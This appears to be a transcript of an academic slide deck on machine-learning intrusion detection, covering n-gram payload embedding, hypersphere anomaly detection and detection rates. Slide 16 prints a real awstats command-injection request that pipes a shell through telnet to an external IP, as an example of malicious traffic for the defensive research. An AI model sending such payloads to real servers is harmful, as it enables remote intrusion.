1
Machine Learning
for Network Intrusion Detection
Dr. Marius Kloft, Dipl.-Math.
2
Personal Information
Berkeley,
California
• Dr. Marius Kloft
▫ Studies
 in physics and mathematics
▫ at University of Marburg
 in computer science
▫ in Berkeley and Berlin
▫ Degrees
 Dipl.-Mathematiker, 2006
▫ Thesis in pure math
 Dr. rer. nat., 2011
▫ Thesis in cs and statistics
• PhD advisors
▫ Prof. Dr. Klaus-Robert Müller
 (EECS, TU Berlin)
▫ Prof. Dr. Peter L. Bartlett
 (EECS & Statistics, UC Berkeley)
▫ Prof. Dr. Gilles Blanchard
 (Statistics, Uni Potsdam)
3
Dr. Marius Kloft
• Current occupation
▫ Post-Doc
 jointly appointed at
 Machine Learning Laboratory, TU Berlin
▫ Head: Prof. Dr. Klaus-Robert Müller
 Friedrich-Miescher Laboratory, Max Planck Society, Tübingen
▫ Head: Dr. Gunnar Rätsch (will be transferred to Sloan Center for Cancer Research, New York)
• I am heading the SeqML project team (Berlin/Tübingen)
▫ 2 PhD students
▫ 4 Master's students
▫ PI: Prof. Müller
▫ Goal
 development of intelligent algorithms (“machine learning”)
▫ for computational genome annotation
4
Dr. Marius Kloft
• Research interests
▫ Statistical machine learning methods
 Development of new algorithms
▫ mathematical optimization thereof
 Analysis of their statistical properties
▫ in terms of probabilistic bounds
 Multiple Kernel Learning
▫ My PhD thesis: “Lp-Norm Multiple Kernel Learning”
▫ Applications
 Detection of genes in genomic DNA
 Detection of attacks in computer networks
 Categorization of images
5
Machine Learning Laboratory, TU Berlin
• Some facts
▫ Head
 Prof. Dr. Klaus-Robert Müller
▫ Scientists
 11 post-docs
 35 PhD students
▫ Research focus
 Development of novel intelligent algorithms
▫ for analysis of complex data
• Remind project
▫ Joint project of TU Berlin and Fraunhofer FIRST, Berlin
▫ Development of intelligent methods for detecting intrusions in computer networks
▫ Facts
 Until 2010
▫ 2 post-docs
▫ 5 PhD students
 Spin-off “Trifense GmbH” awarded first prize in the “Gründungswettbewerb” start-up competition (BMWi)
6
Joint work with the members of the Remind project team:
Konrad Rieck, Pavel Laskov, Ulf Brefeld, Christian Gehl, Tammo Krüger,
Patrick Düssel, Nico Görnitz, Rene Gerstenberger, Guido Schwenk
7
Talk Overview
Danger from the internet
What is machine learning (ML)?
Machine Learning for Intrusion Detection
Algorithms for intrusion detection
Empirical analysis
8
Danger from the Internet
• Internet as a risk factor:
▫ Omnipresence of computer
worms, viruses and trojans
▫ Major damage to companies
and customers
▫ Increasing criminalization
9
Why do we still get hacked?
• New vulnerabilities are
discovered
▫ 2,000-3,000 vulnerabilities
per year
• New attacks are developed
▫ high degree of automation
• Incident response is too
slow
10
How secure are modern detection tools?
• Experiment
▫ Current instances of malware were collected from a Nepenthes honeypot
▫ Files were scanned with Avira AntiVir
• Results
▫ First scan:
▫ Second scan:
• Conclusion
▫ After four weeks, 15% of malware instances were still not recognized!
12
What is statistical machine learning?
• Given:
▫ Data $x_1, \dots, x_n$
 E.g., $x_i$ could be an HTTP request (possibly carrying a computer attack)
▫ Concepts $y_1, \dots, y_n \in \{0, 1\}$
 E.g., $y_i = 1$ could mean that $x_i$ is a computer attack
• Goal:
▫ Finding a function $f$ that models the dependency between $x_i$ and $y_i$
 i.e., $\forall i: f(x_i) \approx y_i$
▫ So that $f$ generalizes to novel, previously unseen $(x, y)$
 i.e., $f(x) \approx y$
• 2-step approach:
▫ 1. Training:
 Input data and concepts into learning algorithm
 Learning algorithm outputs $f$
▫ 2. Prediction:
 Use $f(x)$ to predict labels $y$ for new, unseen $x$
• Core idea
▫ Choose an f that
 Fits the data well
 But is not too “complex”
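The core idea above is commonly written as regularized empirical risk minimization. The following is a sketch in that standard form; the loss $\ell$, the complexity measure $\Omega$, the function class $\mathcal{F}$ and the trade-off parameter $\lambda$ are notation assumed here and do not appear on the slide.

```latex
f^{*} = \operatorname*{arg\,min}_{f \in \mathcal{F}} \;
        \frac{1}{n} \sum_{i=1}^{n} \ell\bigl(f(x_i), y_i\bigr)
        + \lambda \, \Omega(f),
\qquad \lambda > 0
```

The first term rewards fitting the data and the second penalizes complexity; a larger $\lambda$ favors a simpler $f$.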
13
Example: Trade-off of Fit and Complexity
• Data:
• Which f to choose?
▫ Linear f
 Misses two points (too simple)
▫ Polynomial f
 Pro: Perfect on training data
 Con: does not generalize to new data
▫ Too complex
• Machine learning solution:
▫ Not too complex, not too simple
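The trade-off can be tried out numerically. The sketch below fits polynomials of three degrees to hypothetical toy data (a sine trend plus noise, not the data shown on the slide) and reports the error on the training points and on fresh test points. The degrees 1, 3 and 9 and all variable names are illustrative assumptions.

```python
import numpy as np

# Hypothetical toy data: a smooth trend plus noise (not the data from the slide).
rng = np.random.default_rng(0)
x_train = np.linspace(-1.0, 1.0, 10)
y_train = np.sin(2.0 * x_train) + 0.2 * rng.standard_normal(x_train.size)
x_test = np.linspace(-0.95, 0.95, 50)
y_test = np.sin(2.0 * x_test)


def fit_and_score(degree):
    """Least-squares polynomial fit; returns (training MSE, test MSE)."""
    coeffs = np.polyfit(x_train, y_train, degree)
    train_mse = float(np.mean((np.polyval(coeffs, x_train) - y_train) ** 2))
    test_mse = float(np.mean((np.polyval(coeffs, x_test) - y_test) ** 2))
    return train_mse, test_mse


# Degree 1 is the "linear f"; degree 9 passes through all 10 training points.
results = {d: fit_and_score(d) for d in (1, 3, 9)}
for degree, (train_mse, test_mse) in results.items():
    print(f"degree {degree}: train MSE {train_mse:.4f}, test MSE {test_mse:.4f}")
```

The training error can only shrink as the degree grows, so it cannot be used to pick the degree; the error on unseen points is what reveals whether f is too simple or too complex.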
15
Benefits of Machine Learning for Intrusion Detection
• Ability to generalize from large amounts of data
▫ automation of decision making
▫ faster incident response times
• Understanding of statistical foundations of
empirical inference
▫ better accuracy, low false alarm rates
• Ability to detect novelty
▫ protection against new attacks
16
What Does Network Payload Look Like?
• Innocuous payload
▫ GET / HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aAccept-Language:
en\x0d\x0aAccept-Encoding: gzip, deflate\x0d\x0aCookie:
POPUPCHECK=1150521721386\x0d\x0aUser-Agent: Mozilla/5.0
(Macintosh; U; Intel Mac OS X; en) AppleWebKit/418 (KHTML, like
Gecko) Safari/417.9.3\x0d\x0aConnection: keep-alive\x0d\x0aHost:
www.spiegel.de
• Malicious payload
▫ GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;sleep%207200%7ctel
net%20194%2e95%2e173%2e219%204321%7cwhile%20%3a%2
0%3b%20do%20sh%20%26%26%20break%3b%20done%202%3
e%261%7ctelnet%20194%2e95%2e173%2e219%204321;echo%2
0YYY;echo|HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aUser-Agent:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\x0d\x0aHost:
wuppi.dyndns.org:80\x0d\x0aConnection: Close\x0d\x0a\x0d\x0a
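What the malicious request tries to do becomes easier to see once the percent-encoding is removed. The sketch below decodes the query string with Python's standard `urllib.parse.unquote`. The string is copied from the payload above with the transcript's line wraps joined back together, which is an assumption about the original request.

```python
from urllib.parse import unquote

# Query string of the malicious request above. The transcript wraps it over
# several lines; joining those lines is an assumption.
encoded = (
    "configdir=|echo;echo%20YYY;sleep%207200%7ctelnet%20194%2e95%2e173%2e219"
    "%204321%7cwhile%20%3a%20%3b%20do%20sh%20%26%26%20break%3b%20done%202%3e"
    "%261%7ctelnet%20194%2e95%2e173%2e219%204321;echo%20YYY;echo|"
)

# unquote() turns each %XX escape back into the character it encodes.
decoded = unquote(encoded)
print(decoded)
```

The decoded parameter is a chain of shell commands joined by pipes, including two `telnet` connections to an external host, whereas the innocuous request contains only ordinary HTTP headers.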
17
From Network Payload to Vectors
• General idea
▫ Count occurrences of substrings (“n-grams”)
▫ Define an appropriate embedding function $\Phi$
 Example: $\Phi(\text{"abracadabra"}) = (2, 2, 1, 1, 1, 1, 1)$
▫ In the end, payload is represented as vectors
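A minimal sketch of such an embedding follows. The slide does not state the n-gram length; the vector (2, 2, 1, 1, 1, 1, 1) is reproduced with n = 3 when the n-grams are listed in order of first occurrence, so both choices are assumptions made here. The function name `ngram_embedding` is hypothetical.

```python
from collections import Counter


def ngram_embedding(payload: str, n: int = 3) -> dict:
    """Count every contiguous substring of length n in the payload."""
    grams = (payload[i:i + n] for i in range(len(payload) - n + 1))
    # Counter keeps keys in order of first occurrence (Python 3.7+).
    return dict(Counter(grams))


counts = ngram_embedding("abracadabra", n=3)
print(counts)
# {'abr': 2, 'bra': 2, 'rac': 1, 'aca': 1, 'cad': 1, 'ada': 1, 'dab': 1}
print(tuple(counts.values()))
# (2, 2, 1, 1, 1, 1, 1)
```

To compare different payloads, each n-gram needs a fixed coordinate shared by all vectors, for example its index in a vocabulary built from the training data.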
18
Detection of New Attacks
(Rieck et al., DIMVA 2007)
• Anomaly-based machine
learning approach
▫ Represent network payload
as vectors
▫ Find a hypersphere
 that encloses the innocuous
data (blue circles)
 and generalizes to new data
▫ Points outside of the
hypersphere (red circles)
 are flagged as being
anomalous
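The hypersphere idea can be sketched in a few lines. The version below is a deliberately simplified stand-in, not the method of the cited paper: it places the center at the mean of the innocuous vectors and sets the radius to a quantile of their distances. The function names, the 0.95 quantile and the toy data are all assumptions.

```python
import numpy as np


def fit_sphere(X_normal, quantile=0.95):
    """Center = mean of the normal vectors; radius = a quantile of their distances."""
    center = X_normal.mean(axis=0)
    distances = np.linalg.norm(X_normal - center, axis=1)
    radius = float(np.quantile(distances, quantile))
    return center, radius


def is_anomalous(X, center, radius):
    """True for every row of X that lies outside the sphere."""
    return np.linalg.norm(X - center, axis=1) > radius


# Hypothetical toy vectors standing in for embedded innocuous payloads.
rng = np.random.default_rng(0)
X_normal = rng.normal(loc=0.0, scale=1.0, size=(200, 5))
center, radius = fit_sphere(X_normal)

# One point near the center and one far away from all training data.
X_new = np.vstack([np.zeros(5), np.full(5, 10.0)])
flags = is_anomalous(X_new, center, radius)
print(flags)
```

Choosing the radius as a quantile rather than the maximum distance leaves a few training points outside the sphere, which keeps single unusual training points from inflating it.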
19
How well does our system work?
• Detection results
▫ Evaluation on a real attack dataset generated by a penetration testing expert
▫ Detection of 80-93% of unknown attacks in HTTP, FTP and SMTP protocols without false alarms
▫ Major improvement of accuracy in comparison to the standard signature-based IDS Snort
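The two quantities reported above, the share of attacks detected and the share of innocuous requests falsely flagged, can be computed as sketched below. The labels in the example are made up for illustration and are not the evaluation data; the function name is hypothetical.

```python
def detection_and_false_alarm_rate(y_true, y_pred):
    """Return (detection rate, false alarm rate) for 0/1 labels, 1 = attack."""
    attacks = sum(1 for t in y_true if t == 1)
    benign = len(y_true) - attacks
    if attacks == 0 or benign == 0:
        raise ValueError("need at least one attack and one benign sample")
    detected = sum(1 for t, p in zip(y_true, y_pred) if t == 1 and p == 1)
    false_alarms = sum(1 for t, p in zip(y_true, y_pred) if t == 0 and p == 1)
    return detected / attacks, false_alarms / benign


# Made-up labels: 5 attacks followed by 5 benign requests.
y_true = [1, 1, 1, 1, 1, 0, 0, 0, 0, 0]
y_pred = [1, 1, 1, 1, 0, 0, 0, 0, 0, 0]
rates = detection_and_false_alarm_rate(y_true, y_pred)
print(rates)
# (0.8, 0.0)
```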
20
Outlook: Extensions of the Framework
• Active learning
▫ Finding data points
 that, when presented to a security expert, maximally help the performance of the system
▫ Problem: which data points to present for labeling?
▫ In a nutshell: focus on points that contain novel, uncertain information
(e.g., Görnitz, Kloft et al., ACM AISEC 2009, ECML 2009)
• Automatic feature selection
▫ Payloads can be represented by
various feature embeddings
 Which feature embedding to take?
▫ “Multiple Kernel Learning”
approach:
(M. Kloft, PhD thesis, 2011)
 Use all embeddings
simultaneously
▫ But take a weighted
combination
▫ Do it automatically at training
time
(e.g., Kloft et al., ACM AISEC 2008, ECML 2009,
NIPS 2009, ECML 2010, NIPS 2011, JMLR 2011)
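Both extensions can be illustrated with small sketches. The first function picks the points closest to the boundary of a hypersphere as the "uncertain" ones to show to an expert; the second forms a weighted sum of kernel matrices, one per feature embedding. These are simplified illustrations under stated assumptions, not the algorithms of the cited papers: the uncertainty criterion is one possible choice, and the kernel weights are fixed by hand here, whereas Multiple Kernel Learning determines them at training time. All names and numbers are hypothetical.

```python
import numpy as np


def most_informative(X_unlabeled, center, radius, k=2):
    """Indices of the k points closest to the sphere boundary (most uncertain)."""
    margin = np.abs(np.linalg.norm(X_unlabeled - center, axis=1) - radius)
    return np.argsort(margin)[:k]


def combine_kernels(kernels, weights):
    """Weighted sum of kernel matrices, one matrix per feature embedding."""
    weights = np.asarray(weights, dtype=float)
    if len(kernels) != weights.size or np.any(weights < 0):
        raise ValueError("need one non-negative weight per kernel")
    return sum(w * K for w, K in zip(weights, kernels))


# Hypothetical example: four 2-D points, sphere of radius 1 around the origin.
X = np.array([[0.1, 0.0], [0.9, 0.0], [1.2, 0.0], [5.0, 0.0]])
queries = most_informative(X, center=np.zeros(2), radius=1.0)
print(queries)

# Two hypothetical embeddings of the same three payloads -> two linear kernels.
A = np.array([[1.0, 0.0], [0.0, 1.0], [1.0, 1.0]])
B = np.array([[2.0], [0.0], [1.0]])
K = combine_kernels([A @ A.T, B @ B.T], weights=[0.7, 0.3])
print(K)
```

Restricting the weights to be non-negative keeps the combined matrix a valid kernel, since a non-negative sum of positive semidefinite matrices is again positive semidefinite.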
21
Conclusions
• Intrusion detection
▫ Detecting malicious payload in network streams
• Machine learning approach
▫ Embedding of application payloads in vector spaces
▫ Detection of anomalies in embedded data
• Empirical analysis
▫ Detection of 80-93% of unknown attacks
 no false positives
▫ Allows one to find novel attacks